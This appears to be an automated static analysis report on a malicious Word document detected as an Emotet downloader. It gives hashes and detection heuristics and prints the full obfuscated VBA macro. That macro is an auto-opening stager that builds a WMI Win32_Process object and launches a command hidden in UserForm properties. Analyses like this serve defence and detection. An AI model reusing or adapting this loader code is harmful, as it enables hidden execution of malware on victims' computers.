Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f43e11eca26da901…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 197.4 KB
Created: 2019-12-18 08:26:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 0c9bf188df6018db8daecd7d6f8e73a0
SHA-1: eae18ce7a7eb286e960f4b6fbcd014780cb06c74
SHA-256: f43e11eca26da901a30dda136c7039b3abe7895ad174067ebd0a0639c7c750a5
Risk Score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7464372-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464372-0
  • VBA macros detected (severity: medium; 4 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (severity: critical; rule: OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script:
    Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
    Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
    Private Sub Document_open()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10697 bytes
SHA-256: 46bc66e7944768f389fb49a211b7889dfddf333fea30766c468c11f7e6f20d48
Detection: ClamAV: No threats found
Obfuscation or payload: likely
344 of 513 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Cfifdbzh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Jirqxvrcjakzc
         Case Dhgzjyzqjcpm
   Oyrcksll = Sin(Hhoupuixdsloy)
   Aksioijycvctx = CStr(Kriksbjf)
   Trjzoazlcji = 324
   Knxjmzma = Sin(Yitfnmxre)
   Uqaynuciuivr = CStr(Wuswgnoilkrvu)
   Esdbjqwxkzeks = 567
   Dqehrsfuydflf = Sin(Raqipprqf)
   Whwbdvso = CStr(Rmvgzyfx)
   Rheieujai = 5645
End Select
For Yarvxxxaktrjf = Vcqqmtcciod To Jlrfubslelcai
      While Layyiryhkrag <> Igtjzryblodhb
         Nqewirhqefg = Houvwnvej * Atn(Fvjpjvbph) * (Bvkogaqodtgtu + Iknvmeyvqnhs)
      Wend
Next
   Select Case Vehtpovkfitu
         Case Fhtiknlvszx
   Zpuuttwposwh = Sin(Heiqeqrbekhf)
   Zmhwjsvvlo = CStr(Fzrowakt)
   Jjtpdxkjmntm = 324
   Kaygxmsu = Sin(Ksjqnhuf)
   Dydtpykbb = CStr(Tjqdwcdvs)
   Sqelntwftnh = 567
   Lxerzbqsfvrit = Sin(Frjmingmoek)
   Wstmbsszx = CStr(Rjxnunduheabd)
   Kfkpnokkwmcfg = 5645
End Select
For Rhenvzqtsbbq = Vqprcimo To Hgybasixtnntx
      While Ztlsomxbjavmn <> Hczfgoapsase
         Nctztcobwumj = Affvtagkurk * Atn(Esrviafvybnub) * (Gfswjlpnu + Wpdhcpjdki)
      Wend
Next
   Select Case Xutfhjzrc
         Case Fxvmwkubs
   Hmzcyhinjzpn = Sin(Jdcqrdzqn)
   Kpwnatild = CStr(Fekrioviq)
   Engrlasuqye = 324
   Rmzifgbducx = Sin(Zukvffxvl)
   Jiitixhbj = CStr(Wondjilj)
   Sfaxkutyxt = 567
   Tywyivwv = Sin(Kzywicwojby)
   Chvycocmcts = CStr(Gkzqmpmevbz)
   Qcijefvhuq = 5645
End Select
For Ugubhfgatwlpt = Kmggwkpxzd To Nzglultsisc
      While Snsurtqpvkvnk <> Ejuypptbnk
         Zwbsjskd = Cikbarokyjuhn * Atn(Eyfzlfkaprsus) * (Aoohgmonpbmc + Jrjcteued)
      Wend
Next
Xgmmntpfabj
End Sub

Attribute VB_Name = "Nvexppvwbclb"
Attribute VB_Base = "0{A6D80BC6-2311-44CA-A76A-75F767D585D2}{366FF9DB-38AE-4D4B-A864-A07D6AC66334}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Uyrkuoeaboav"
Function Wyjpoleontqe()
   Select Case Pudafirtriera
         Case Ethbtoflgkn
   Rcdncrfu = Sin(Uvfwlerxpk)
   Ncqpkjiwqrbq = CStr(Erpjovsjmgn)
   Hpnywjyobxnh = 324
   Ptdupuwzah = Sin(Vzepkbsqagcsf)
   Adubcsjd = CStr(Myxwipfsan)
   Lmloelirkp = 567
   Vvfgddlvogy = Sin(Tsrxaeseqrhq)
   Yvyzxpgbmjz = CStr(Cdwfoitltrtkk)
   Fdypppnapg = 5645
End Select
For Osfhykhqbum = Ucfefomav To Ljahocgynv
      While Njvaczjkrgiu <> Wksontwww
         Zcznoemqjr = Ojallreagu * Atn(Wgzhlxrng) * (Wkwdbvde + Ademhkfr)
      Wend
Next
Svoeisqwp = Cfifdbzh.Txqcvasu
   Select Case Ywnwqvijnirak
         Case Ixsdlntodw
   Gvwqliwgnveis = Sin(Xamjybve)
   Svleikaex = CStr(Qsfsokxnsjl)
   Voqmnvkqqk = 324
   Kbfkeeuzmh = Sin(Rjryrnvhl)
   Ttnqbrxahm = CStr(Jscofrka)
   Judemzcpl = 567
   Smrqnshoga = Sin(Fifozppbyu)
   Snxfyysbes = CStr(Lysydmhfo)
   Wgldzvznyygxz = 5645
End Select
For Qiithmrz = Xqxlmhvk To Znutfefr
      While Asdbvzxvb <> Ghccecbmr
         Lucdnpochas = Envqnkai * Atn(Sfsqacdfptnhi) * (Lhhzdenibxrg + Hkehzjyvynzdv)
      Wend
Next
Twyotyzlmuu = Svoeisqwp + Nvexppvwbclb.Kdxtincasrpzy + Nvexppvwbclb.Fhwefplfn + Nvexppvwbclb.Ejngnmrbmmuof
   Select Case Rcmsldowoup
         Case Fqejjmrliy
   Doirgesgqe = Sin(Lbolnkoemqmf)
   Apybidcjhpff = CStr(Xauaxmyixgy)
   Fwmbdkkech = 324
   Qqctzgibyglwm = Sin(Xrssdkswmuoc)
   Lvtfehvwpyzpw = CStr(Kqpvpnnkollyt)
   Lendnlsqhbzac = 567
   Oogxbeygfkxk = Sin(Sibgqnvbsyns)
   Uqmlqvxxs = CStr(Umxitpanxos)
   Lgxmvhjjeqmp = 5645
End Select
For Ujvvqerway = Inectcsszkylb To Fqwksvdgebs
      While Cpfzswyvebxk <> Nkkkufrmg
         Bdfhzbaazpk = Tfmraozavqpvu * Atn(Vbqjblqtsofaw) * (Pcflrptzlremf + Lfkbfyzbdnc)
      Wend
Next
Ybazpsmlhhhz = Twyotyzlmuu + Nvexppvwbclb.Kxwxljzwwv + Nvexppvwbclb.Jjxokufcbwu.Factoid
   Select Case Cdvzgcgdbcvr
         Case Xyhuuhukhb
   Mzlaphwlln = Sin(Tsqekxotqanh)
   Sfasvthyqg = CStr(Moulxjop)
   Qqzknzsl = 324
   Feorltsql = Sin(Jmjlzyfd)
   Fkrojslfifeu = CStr(Iadzeryefzgdq)
   Anihlztxcba = 567
   Dqypzncyuf = Sin(Ubfshfbnqhs)
   Bvpdaydkmbo = CStr(Edvpghjurynf)
   Ztuwxccyrnvug = 5645
End Select
For Haqrqbxr = Knsjxbyf To Rsfqypfm
      While Mbnsjywneubc <> Npjotmwoerkp
         Sbvligojzzaye = Icpzkdjf * Atn(Vyxwvhudwudy) * (Mgepjovhlnwo + Kwjvesmirme)
      Wend
Next
Wyjpoleontqe = Pwygysmwjcru + Ybazpsmlhhhz + Pwygysmwjcru
   Select Case Lcwitdhj
         Case Nlgyrrzxn
   Sqgvgxjelxtsa = Sin(Ihvliyfbv)
   Yxzvqreeslp = CStr(Fyexittfhlj)
   Bbynpkdr = 324
   Fpgbowytsv = Sin(Jthscyirl)
   Pqdgewfi = CStr(Nzhbrfjjs)
   Svrefwifihzom = 567
   Kptxnmmzwu = Sin(Kszitzgwulb)
   Xdnznkujgutpu = CStr(Gvvkffymiz)
   Gvqznuyqjzz = 5645
End Select
For Fheygszwvq = Rttzreahvno To Fvwnbgvmbzyt
      While Hgslfrjw <> Rrvzbortp
         Wdjtjdeq = Fcbsaccixmiv * Atn(Jlvkmieelckdj) * (Oeggjlotgalol + Rblmkxhtdlq)
      Wend
Next
End Function
Function Xgmmntpfabj()
   Select Case Zcvyzfxy
         Case Lgootoeshbduc
   Nsfrcnunt = Sin(Tzysthmqjxvg)
   Pzmnyfzsqlmsh = CStr(Qtuobvetoi)
   Mtkrmdrno = 324
   Uusajmgaatese = Sin(Aelfxfdxmzft)
   Pfyitaujuug = CStr(Upiagqucn)
   Kuqxfbdtg = 567
   Ngjkaxqkqy = Sin(Iheyzdfmcdpxz)
   Etrnbxkccqvpw = CStr(Lkuwipac)
   Axhjqmkramr = 5645
End Select
For Oayfchdnia = Fcdbgdqmyazd To Elyvzlmzgv
      While Yubcrwhrlj <> Tjammnbvmqd
         Mbofgwirwfw = Icvbaveicpkzm * Atn(Pxhrjmevslem) * (Xeebqeyzlqhnh + Dfteocyxeb)
      Wend
Next
MNDUE = "32ksad_weddv"
Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
   Select Case Dudqtilj
         Case Mzvpijcqtv
   Pwwovkwiib = Sin(Dekxkkgn)
   Vnncqdpyr = CStr(Tfhtenanpakf)
   Dzfgjouyib = 324
   Susskkdk = Sin(Cdgwfawgkhvpn)
   Rhbyvwgkdu = CStr(Xqachcewcamj)
   Bqbfdhoj = 567
   Blocwtcb = Sin(Zpkfnmiih)
   Sdtupjyrzfoy = CStr(Vobzixlk)
   Mgvrqyfb = 5645
End Select
For Iiuhgkekz = Rneryhiztj To Rijngbbamxp
      While Tttytakoqut <> Rqxchyasczwwx
         Zyuynefnpaajy = Oqxhjkdk * Atn(Rvquwbvrlor) * (Dvlchbhpbrbk + Qzowofhvjpttz)
      Wend
Next
Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
   Select Case Yhdhwylebxxim
         Case Ufaiuzqc
   Ewxcbkbfj = Sin(Hsezvbfg)
   Jlcbtpgvxhe = CStr(Rcoczmvd)
   Cmnwjzxkw = 324
   Ulvahvujmow = Sin(Mxgzftjmgfa)
   Sxwzwidlx = CStr(Bsrbuqrgfwjl)
   Fcocnfumccwmm = 567
   Dfpgnynbisp = Sin(Jijmebrfpijl)
   Ppehdasbquf = CStr(Sbfkxradtskil)
   Oxfupjxme = 5645
End Select
For Mbhspgzbye = Mtylwwtzsajmt To Pqvobzlfyv
      While Eikbefzt <> Xaqkltlsvya
         Kdqhyaozqv = Qhzfhtvkytu * Atn(Ortgaccjyay) * (Bslrgexuummmn + Klqisqjiv)
      Wend
Next
Fhpzuxlwmaukx = Yidwojlxvu + Nvexppvwbclb.Ygxcnftfdrk.ControlTipText + Nvexppvwbclb.Gyykdkjt.ControlTipText
   Select Case Kumigxelb
         Case Xmpmgyjz
   Mkdugown = Sin(Savlzvwq)
   Rykgmjohasp = CStr(Iyjiozjiybdjx)
   Nlbtkiina = 324
   Xapmhovam = Sin(Miqfitxhxos)
   Pqwmrzljlfci = CStr(Tonxeswztc)
   Opsateqv = 567
   Rjjnahacowp = Sin(Tjqnqxpw)
   Qlvqlmxsx = CStr(Xeorrpyr)
   Kgmzrcqzxh = 5645
End Select
For Csbfqpqqeruav = Wzhrffxf To Rujgszgizb
      While Myjbxftmldm <> Apqosfmxwyvg
         Rnswcghnii = Rmsxohimr * Atn(Thwjspanuot) * (Thktmnghlknae + Oxwthxyofx)
      Wend
Next
Zcamqyegpjckz = Fhpzuxlwmaukx + Cfifdbzh.Txqcvasu
   Select Case Nebhhwjgrpo
         Case Tlnyovaatjkdu
   Dmxhndeenl = Sin(Fxdrrcxik)
   Zzkouvqdnx = CStr(Frhdtoha)
   Pvcprtbx = 324
   Ccxicokiwhyie = Sin(Zkydtcawxjple)
   Cqgaactyafezd = CStr(Hqhrsict)
   Bgazndfeyfibd = 567
   Gmxypdxrubzdn = Sin(Zwjezwtyncy)
   Zugmovlwe = CStr(Sepfyozst)
   Mrzuznnkw = 5645
End Select
For Srzumpsasu = Lugnaycg To Tiomtvyitzrj
      While Gdbjztrllpozs <> Ltjixxrgzwx
         Aakbiihwxt = Diwyytcyv * Atn(Iboaoxbnc) * (Lkfmrktqo + Atpuhacv)
      Wend
Next
Set Xgmmntpfabj = CreateObject(Zcamqyegpjckz)
   Select Case Mkeoisdh
         Case Ebiywags
   Yovmuwzznhy = Sin(Hiltnvlsime)
   Earikgew = CStr(Osumtdtgbzmbq)
   Txcvpbrzq = 324
   Hfwsasdkxbtjs = Sin(Fcnqckgbrjc)
   Vwsdtuvojjz = CStr(Gnfaojhawomaq)
   Dfixrpob = 567
   Pysbvtoveet = Sin(Ustnzhfccfuk)
   Bdirlxky = CStr(Zavyfmkhino)
   Cotcmnsxrrtmr = 5645
End Select
For Hygvheozmh = Vmcqmwfgdsu To Trijclnrxa
      While Swtophuow <> Oahpmojpeh
         Nfqkwjzymsj = Lsnlzjowftjvv * Atn(Okezhigi) * (Yfxyzvqnpbwve + Vrhmhpbhxkboj)
      Wend
Next
Xgmmntpfabj.XSize = False
   Select Case Dzaqiwcty
         Case Rxjjznnirydbp
   Feszrdghtgdqh = Sin(Wmejmvcgw)
   Ohizylmkrxaz = CStr(Kqqcvwfukbqw)
   Dcyvexpyztis = 324
   Wjwnvqbfmebyo = Sin(Gjcfugozeuldm)
   Ucsiyafdapqyq = CStr(Gjvatkfmjqhk)
   Jmoopjyfgvwa = 567
   Qeiyfkoc = Sin(Wmppjrqqnl)
   Bjakvadz = CStr(Edwfijehdhdc)
   Ujwofgmu = 5645
End Select
For Dyyvooyjidh = Dihmghjyyrwp To Ouxgjsic
      While Jtoiuunwip <> Xtgmbpegb
         Kkpkxxtk = Wcmsbddeahwli * Atn(Zwrtxcje) * (Yfkqyoerg + Tuzlbcayeyb)
      Wend
Next
Xgmmntpfabj.YSize = False
   Select Case Okkazawojaab
         Case Mkapxqbst
   Iyhrakbqntmtr = Sin(Jwfvdezag)
   Rzduwrpbrcpw = CStr(Zlqmzrihqhe)
   Quixbwgsbmtxv = 324
   Retzvfetiog = Sin(Kjwpjtygif)
   Dxxyxpen = CStr(Lnersmbaius)
   Spdncfkiy = 567
   Shhulycqsuxik = Sin(Meiwthhq)
   Tbbiihmify = CStr(Hokscdnvh)
   Ctfablrlrclrw = 5645
End Select
For Kmkzftohw = Bedcjbafzo To Lxnmubwxn
      While Takhncnljgpk <> Otjqqathf
         Sgtfavyi = Cyundlctav * Atn(Eghnhxrb) * (Lfvvugilqbdy + Odmoqofdorbn)
      Wend
Next
Do While Hfiglzcehibq.Create(UJNDB & Wyjpoleontqe, Hsqlwgckyi, Xgmmntpfabj, Dbsewlml)
Loop
   Select Case Frszjoiyo
         Case Lxxxyncay
   Eqxhbtpdgo = Sin(Ifjswjfqwr)
   Tddhcbzto = CStr(Cbbnojlqtr)
   Spvgqsaqnjq = 324
   Qhafoaxpsgquw = Sin(Lbmpholrg)
   Aobzskmqxb = CStr(Frnzziemub)
   Lxbhifquj = 567
   Jnsoghftfaqgx = Sin(Liciozuwoui)
   Slqbzrelh = CStr(Eoioevqdmsuhr)
   Apreuxbxatko = 5645
End Select
For Pddoeezrf = Dfspydyairpu To Acrhuugjxxpqt
      While Rjjzlrsjhcqlo <> Aibpebijlxm
         Vahkmdqif = Ihtjeeirkjw * Atn(Diujzyczwln) * (Fzkiguokgwiy + Oujyztsgd)
      Wend
Next
End Function